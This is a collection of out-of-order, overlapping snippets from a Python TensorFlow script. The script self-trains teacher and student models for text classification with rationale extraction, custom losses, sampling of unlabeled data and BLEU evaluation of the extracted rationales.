"class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None if 'focal' in type_: rat_loss", "{} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if '_neg' in type_:", "acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for token (macro/task):", "y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) rat_loss = None if 'focal'", "patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss", "replace=False) if '_neg' in type_: X_unlabeled_sample, y_pred = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask':", "indices = np.asarray(indices) #indices = np.random.choice(len(X_unlabeled_sample['input_ids']), unsup_size, replace=False) X_batch, y_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices],", "for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev, [y_dev[:,0],y_dev[:,1:]]))) ''' if not os.path.exists(model_file): model.save_weights(model_file) logger.info", "def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel,", "range(len(X_test[\"input_ids\"])): text = tokenizer.decode(X_test[\"input_ids\"][i]) temp = dict() temp['text'] = text temp['truth'] = truth[i]", "on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on test", "'l2_distance': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss =", "[y_test[:,0], y_test[:,1:]], verbose=0)[-2] elif 'joint_neg' in type_: y_neg_dev = np.full((len(y_dev), len(labels)), 1/len(labels)) y_neg_test", "Shape: {} {}\".format(X_test[\"input_ids\"].shape, y_test.shape)) logger.info (\"X Unlabeled Shape: {}\".format(X_unlabeled[\"input_ids\"].shape)) strategy = tf.distribute.MirroredStrategy() gpus", "= np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage of rationales selected: {}\".format(np.mean(np.sum(attention_mask_r, axis=-1))))", "1, 0, 0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(),", "model.predict(X_unlabeled_sample, batch_size=256) y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(), axis=-1) y_pred", "= np.argmax(y_pred, axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: out", "y_dev[:,0], y_neg_dev], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc", "'pruthi_' in type_: out = y_train acc, y_pred, r_acc = y_train[:,0], y_train[:,1:], y_train[:,0]", "y[train_size:] elif 'joint' in type_: X_train, y_train = {\"input_ids\": X[\"input_ids\"][:train_size], \"token_type_ids\": X[\"token_type_ids\"][:train_size], \"attention_mask\":", "shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) #, sample_weight=[X_conf[:,0], X_conf[:,1:]]) elif", "set (student model): {} \".format(score4/len(pred))) data = [] for i in range(len(X_test[\"input_ids\"])): text", "== 'mtl': test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]],", "input for task: {}\".format(X_sample[\"input_ids\"][:5])) logger.info(\"Extracted rationale from teacher model as input for task:", "y_test[:,1:], y_test[:,0], y_neg_test], verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:],", "else: indices = np.array([i for i in range(len(y_pred))]) acc = acc[:,None] y_batch =", "X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:],", "np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #compute confidence on the unlabeled set if", "= acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch,", "np.ones(len(y_test))]) task_acc, test_acc, r_acc = out[3], out[4], out[5] logger.info (\"Test token acc for", "instances sampled from {} unlabeled instances\".format(sample_size, len(X_unlabeled[\"input_ids\"]))) indices = np.random.choice(len(X_unlabeled[\"input_ids\"]), sample_size, replace=False) if", "[y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='dense_3_classification_acc', patience=5, restore_best_weights=True)], sample_weight=[X_conf[:,0], X_conf[:,1:]]) if 'fine_tune_teacher' in type_: rat_loss", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "best_test_acc = 0. max_test_acc = 0. max_task_acc = 0. max_best_acc = 0. val_loss", "transformers import * import logging import math import models import numpy as np", "X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample, y_pred =", "(macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='micro'))) logger.info(\"Token", "import models import numpy as np import os, sys import json import nltk", "test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-1] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[-2] val_loss", "type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred, r_acc = out[0], out[1], out[2] #y_val", "pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+= max_seq_length-truth_1 pred.append(' '.join(temp_p)) truth.append('", "performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='micro'))) logger.info(\"Model performance for token (macro/task): {}\".format(precision_recall_fscore_support(y_pred1,", "in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0, 0, 0)) score2 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0,", "y_pred): cce = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction=tf.keras.losses.Reduction.NONE) if 'focal' in type_: cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE)", "set if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample,", "defaultdict from sklearn.utils import shuffle from transformers import * import logging import math", "metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:]]), batch_size=unsup_batch_size*gpus,", "y_dev_plg = [y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),len(labels)), 1/len(labels))] y_test_plg = [y_test[:,1:], y_test[:,0], np.full((len(y_test),len(labels)), 1/len(labels))] test_acc", "X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train", "test_pred)) tp, fn, fp = 0, 0, 0 pred_1, pred_0, truth_1, truth_0 =", "= out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat = np.amax(tf.math.softmax(y_pred, axis=-1).numpy(),", "tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred[1:]-y_pred[:-1]), axis=0)) #l2_loss = 0.0 #logger.info(l1_loss) return cce_loss + 0.01*l1_loss + 0.01*coh_loss def", "1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'not_rationale_task_classifier':", "range(len(y_pred))]) acc = acc[:,None] y_batch = np.concatenate((acc[indices], y_pred[indices]), axis=1) X_batch = {\"input_ids\": X_unlabeled_sample['input_ids'][indices],", "model.fit(x=X_batch, y=[y_batch[:,0], y_batch[:,1:], y_batch[:, 0], np.full((len(y_batch),len(labels)), 1/len(labels))], shuffle=True, epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "score4 = 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(),", "* import logging import math import models import numpy as np import os,", "type_: loss_weights = [1.0, 0, 0, 0] elif '_no_suffcomp' in type_: loss_weights =", "#_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if", "{\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} ''' probs = y_val[indices] X_conf = np.ones((len(y_batch),", "'mtl' in type_: class_acc = model.predict(X_test)[0] test_pred = model.predict(X_test)[1] class_acc = np.argmax(class_acc, axis=-1)", "epochs=unsup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif", "strategy.scope(): model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss=[tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), rat_loss], metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"dense_3_classification_acc\")])#, tf.keras.metrics.SparseCategoricalAccuracy(name=\"token_acc\")]) #, sample_weight_mode=\"temporal\") model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:]], shuffle=True,", "score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0,", "y_test[:,1:]], verbose=0) logger.info(\"Print acc (task) for joint {}\".format(temp)) logger.info (\"Val acc (token) {}\".format(test_acc))", "sample_weight=[X_conf[:,0], X_conf[:,1:], X_conf[:,0], np.ones((len(y_batch)))]) # class_weight=class_weight) if 'fine_tune_teacher' in type_: rat_loss = None", "np.inf data = [] for i in range(len(X_test[\"input_ids\"])): text = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i]) temp =", "max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment; choose all", "type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] = np.array(y_pred) #logger.info(y_pred.shape) #logger.info(\"Percentage", "{'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {}", "np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher model for run {}: {}\".format(counter,", "y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss = model.evaluate(X_dev,", "[1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': custom_loss, 'rationale_task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True),", "+ 0.1*l1_loss + 0.01*coh_loss def custom_loss_neg(y_true, y_pred): cce = tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true,", "'mtl' in type_: logger.info (\"Best validation acc for base model {}: {}\".format(best_validation_loss, model.evaluate(X_dev,", "logging.info(\"y_batch shape {}\".format(y_batch.shape)) indices = [] for i in labels: indx = np.where(y_batch[:,0]==i)[0]", "y_test[i][j+1] == 1: temp_t.append(temp[j]) pred_1 += test_pred[i].sum() pred_0+= max_seq_length-pred_1 truth_1 += y_test[i].sum() truth_0+=", "np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i,", "type_: X_neg_rationale_batch = {\"input_ids_neg\": X_negation_sample['input_ids'][indices], \"token_type_ids_neg\": X_negation_sample['token_type_ids'][indices], \"attention_mask_neg\": X_negation_sample['attention_mask'][indices]} else: indices = np.array([i", "X_unlabeled_sample = X_unlabeled #X_unlabeled_sample = {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices]} #logger.info (X_unlabeled_sample[\"input_ids\"][:5])", "1/len(labels)) y_neg_test = np.full((len(y_test), len(labels)), 1/len(labels)) temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], y_neg_test],", "1/len(labels))] test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0],", "patience=5, restore_best_weights=True)]) # class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]]) elif '_neg' in type_", "1/len(labels)) model.fit(x=X_train, y=[y_train[:,0], y_train[:,1:], y_train[:,0], y_neg], shuffle=True, epochs=sup_epochs, validation_data=(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.full((len(y_dev),", "None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file", "[y_dev[:,0], y_dev, y_dev[:,0], np.ones(len(y_dev))]), batch_size=unsup_batch_size*gpus, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_task_classifier_acc', patience=5, restore_best_weights=True)]) # class_weight=class_weight) elif 'joint_neg' in", "= X_rationale_batch['input_ids_r'], X_rationale_batch['token_type_ids_r'], X_rationale_batch['attention_mask_r'] X_batch['input_ids_neg'], X_batch['token_type_ids_neg'], X_batch['attention_mask_neg'] = X_neg_rationale_batch['input_ids_neg'], X_neg_rationale_batch['token_type_ids_neg'], X_neg_rationale_batch['attention_mask_neg'] model.fit(x=X_batch, y=[y_batch[:,0],", "best score (macro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0], average='macro'))) logger.info(\"Teacher model best score (micro/task): {}\".format(precision_recall_fscore_support(class_acc, y_test[:,0],", "'not_rationale_task_classifier': None}, loss_weights=loss_weights) if counter == 0: logger.info(model.summary()) model_file = os.path.join(model_dir, \"model_label.h5\") model_file_task", "model.save_weights(model_file_best) #_student = deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3]", "shape {}\".format(test_pred.shape)) pred, truth = [], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1)", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-2] task_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))],", "axis=-1) #.flatten() acc = np.argmax(acc, axis=-1) elif 'joint' in type_: if 'pruthi_' in", "model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[4] task_acc = model.evaluate(X_test, [y_test[:,0], y_test[:,1:]], verbose=0)[3] val_loss = model.evaluate(X_test,", "'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred =", "ct = [],[], 0 temp = tokenizer.convert_ids_to_tokens(X_test[\"input_ids\"][i])[1:] #logger.info(\"Test sample {}\".format(temp)) for j in", "(macro/task): {}\".format(precision_recall_fscore_support(y_pred1, y_test[:,1:], average='macro'))) logger.info(\"Model performance for task (macro/task): {}\".format(precision_recall_fscore_support(acc1, y_test[:,0], average='macro'))) val_loss", "loss_weights = [1.0, 1.0, 0, 0] ''' model.compile(optimizer=tf.keras.optimizers.Adam(learning_rate=3e-5, epsilon=1e-08), loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': rat_loss,", "np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] = 101 logger.info(\"Extracted rationale from", "np.argmax(y_pred1, axis=-1) acc1 = np.argmax(acc1, axis=-1) r_acc1 = np.argmax(r_acc1, axis=-1) logger.info(\"Model performance for", "type_: X_negation_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, X_negation_sample[\"input_ids\"][i, 1:], 103) X_negation_sample[\"input_ids\"][:,0] = 101 X_sample[\"input_ids\"][:,0] =", "score3, score4 = 0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1 +=", "y_neg_test], verbose=0) elif 'joint' in type_: temp = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.ones(len(y_test))],", "y_pred, r_acc = out[0], out[1], out[2] y_val = np.amax(tf.math.softmax(acc, axis=-1).numpy(), axis=-1) y_rat =", "#X_batch, y_batch, X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_)", "X_sample[\"input_ids\"][i, 1:] = np.where(y_pred[i]==0, 103, X_sample[\"input_ids\"][i, 1:]) if '_neg' in type_: X_negation_sample[\"input_ids\"][i, 1:]", "verbose=0)[0] elif '_neg' in type_: out = model.evaluate(X_test, [y_test[:,0], y_test[:,1:], y_test[:,0], np.full((len(y_test), len(labels)),", "type_ == 'joint': # or 'joint_neg' in type_: test_acc = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:],", "import * import logging import math import models import numpy as np import", "max_best_acc: max_best_acc = test_task_acc model_file = os.path.join(model_dir, \"model_token_{}_{}.h5\".format(epoch, sample_scheme)) model_file_task = os.path.join(model_dir, \"model_task_{}_{}.h5\".format(epoch,", "as input for task: {}\".format(X_negation_sample[\"input_ids\"][:5])) y_mean, y_var, y_T = None, None, None if", "0) negation_mask[:,0] = 1 X_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": attention_mask_r} #mask", "X_conf = f_(tokenizer, X_unlabeled_sample, y_mean, y_var, acc, unsup_size, len(labels), y_T=y_T, type_=type_) probs =", "'attention_mask': X_unlabeled[\"attention_mask\"][indices]}, y_pred[indices] else: logger.info (\"Evaluating confidence on {} number of instances\".format(len(X_unlabeled[\"input_ids\"]))) X_unlabeled_sample", "= {'input_ids': X_unlabeled[\"input_ids\"][indices], 'token_type_ids': X_unlabeled[\"token_type_ids\"][indices], 'attention_mask': X_unlabeled[\"attention_mask\"][indices], 'input_ids_r':X_unlabeled['input_ids_r'][indices], 'token_type_ids_r':X_unlabeled['token_type_ids_r'][indices], 'attention_mask_r':X_unlabeled['attention_mask_r'][indices]}, y_pred[indices] else: X_unlabeled_sample,", "logger.info(\"Token overlap: {}\".format(tp/(tp+fp+fn))) score1, score2, score3, score4 = 0.0, 0.0, 0.0, 0.0 for", "acc = np.argmax(acc, axis=-1) r_acc = np.argmax(r_acc, axis=-1) #y_rat = y_rat[:, 1:] #y_pred", "max_task_acc: logger.info (\"Val acc (task) {}\".format(task_acc)) max_task_acc = task_acc best_val_acc = task_acc model.save_weights(model_file_best)", "[], [] logger.info(test_pred) test_pred = np.argmax(tf.nn.softmax(test_pred, axis=-1), axis=-1) logger.info(\"Printing prediction data on teacher", "0. val_loss = 0. if 'mtl' in type_: logger.info(\"y_test: {}\".format(y_test)) test_acc = model.evaluate(X_test,", "lr_scheduler(epoch): if epoch < warmup_epoch_count: res = (max_learn_rate/warmup_epoch_count) * (epoch + 1) else:", "{\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:], \"attention_mask\": X[\"attention_mask\"][train_size:]}, y[train_size:] else: X_train, y_train = X, y", "y_batch = np.concatenate((acc[indices], y_pred[indices][:, 1:]), axis=1) logger.info(\"y_batch shape: {}\".format(y_batch.shape)) #X_batch, y_batch, X_conf =", "if 'uni' in sample_scheme: logger.info (\"Sampling uniformly\") if unsup_size < len(X_unlabeled_sample['input_ids']): '''X_unlabeled_sample, y_pred", "out[2] class_acc = np.argmax(class_acc, axis=-1) logger.info(\"Class predictions shape {}\".format(class_acc.shape)) logger.info(\"Teacher model best score", "\".format(score2/len(pred))) logger.info(\"BLEU-3 score of rationales on test set (teacher model): {} \".format(score3/len(pred))) logger.info(\"BLEU-4", "\"attention_mask\": X[\"attention_mask\"][:train_size], \"input_ids_r\":X[\"input_ids_r\"][:train_size], \"token_type_ids_r\":X[\"token_type_ids_r\"][:train_size], \"attention_mask_r\":X[\"attention_mask_r\"][:train_size]}, y[:train_size] X_dev, y_dev = {\"input_ids\": X[\"input_ids\"][train_size:], \"token_type_ids\": X[\"token_type_ids\"][train_size:],", "if 'focal' in type_: rat_loss = SparseCategoricalFocalLoss(gamma=2) else: rat_loss = tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True) model =", "0)) score3 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0,", "verbose=0)[-2] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:]], verbose=0)[0] if task_acc > max_task_acc: logger.info (\"Val", "tf import tensorflow.keras as K import tensorflow.keras.backend as kb import tensorflow_addons as tfa", "y_test[:,1:], y_test[:,0], y_neg_test], verbose=0)[-3] elif type_ == 'joint': # or 'joint_neg' in type_:", "= {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i, 1:]", "np.full((len(y_dev), len(labels)), 1/len(labels))]), batch_size=sup_batch_size*1, callbacks=[tf.keras.callbacks.EarlyStopping(monitor='val_loss', patience=5, restore_best_weights=True)]) #, class_weight=class_weight) val_loss = model.evaluate(X_dev, [y_dev[:,0],", "cce = SparseCategoricalFocalLoss(gamma=2, reduction=tf.keras.losses.Reduction.NONE) cce_loss = ((cce(y_true, y_pred))* 1/(unsup_batch_size*gpus)) l1_loss = tf.reduce_mean(tf.reduce_sum(tf.math.abs(y_pred),axis=0)) coh_loss", "nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 1, 0)) score4 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(0, 0, 0, 1)) logger.info(\"BLEU-1", "= np.ones((len(y_batch), max_seq_length)) X_conf[:,0] = np.log(probs+1e-10)*alpha ''' else: logger.info(\"No sampling at the moment;", "0.0, 0.0, 0.0, 0.0 for i in range(len(pred)): score1 += nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split(), weights=(1, 0,", "best_loss = val_loss model.save_weights(model_file_best) #_student = deepcopy(model) ''' if test_acc > max_test_acc: max_test_acc", "hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split X and y to", "= [0, 1] #fix hardcoding labels = set(y[:,0]) logger.info (\"Class labels {}\".format(labels)) #split", "= np.argmax(acc, axis=-1) elif 'joint' in type_: out = model.predict(X_unlabeled, batch_size=64) acc, y_pred,", "rationales on test set (student model): {} \".format(score1/len(pred))) logger.info(\"BLEU-2 score of rationales on", "== 'decoupled' or ('joint' in type_): X_sample = {\"input_ids\": X_sample['input_ids'][indices], \"token_type_ids\": X_sample['token_type_ids'][indices], \"attention_mask\":", "loss={'task_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_classifier': tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True), 'rationale_task_classifier': None, 'l2_distance': custom_loss}, metrics=[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\"), tf.keras.metrics.Mean(name='mean')]) #X_batch.update(X_rationale_batch)", "= model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], np.ones(len(y_dev))], verbose=0)[-3] val_loss = model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0],", "if 'joint' in type_: ids = [] attention_mask_r = np.ones((len(y_pred), max_seq_length)) attention_mask_r[:,1:] =", "X_negation_sample = {\"input_ids\": np.array(X_unlabeled_sample[\"input_ids\"]), \"token_type_ids\": np.array(X_unlabeled_sample['token_type_ids']), \"attention_mask\": negation_mask} for i in range(len(y_pred)): X_sample[\"input_ids\"][i,", "'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'l2_distance': None}) elif 'joint_neg' in type_: rat_loss = None if 'focal'", "tf.keras.losses.CategoricalCrossentropy(from_logits=False, reduction=tf.keras.losses.Reduction.NONE) return tf.reduce_sum(cce(y_true, y_pred))*(1/(unsup_batch_size*gpus)) model = models.construct_teacher_joint_neg(TFModel, Config, pt_teacher_checkpoint, max_seq_length, len(labels), dense_dropout=dense_dropout,", "deepcopy(model) val_acc = task_acc #model.evaluate(X_dev, [y_dev[:,0], y_dev, y_dev[:,0], y_neg_dev], verbose=0)[-3] if test_acc >", "out1 = model.predict(X_test) acc1, y_pred1, r_acc1 = out1[0], out1[1], out1[2] y_pred1 = np.argmax(y_pred1,", "model.evaluate(X_dev, [y_dev[:,0], y_dev[:,1:], y_dev[:,0], y_neg_dev], verbose=0)[-3] out1 = model.predict(X_test) acc1, y_pred1, r_acc1 =", "list(acc[indices]) logger.info(cls) X_conf = np.ones((len(y_batch), max_seq_length)) log_probs = (probs+1e-10) #+(1-y_batch[:,0])*np.log(1-probs+1e-10)) log_rationale = (probs_rat+1e-10)", "text temp['truth'] = truth[i] temp['pred'] = pred[i] temp['score'] = nltk.translate.bleu_score.sentence_bleu([truth[i].split()],pred[i].split()) data.append(temp) with open(os.path.join(model_dir,", "{\"input_ids\": X_unlabeled_sample['input_ids'][indices], \"token_type_ids\": X_unlabeled_sample['token_type_ids'][indices], \"attention_mask\": X_unlabeled_sample['attention_mask'][indices]}, y_batch[indices] if 'joint' in type_: X_rationale_batch =", "'rationale_task_classifier': None, 'not_rationale_task_classifier': None}, metrics={'task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'rationale_task_classifier':[tf.keras.metrics.SparseCategoricalAccuracy(name=\"acc\")], 'not_rationale_task_classifier': None}, 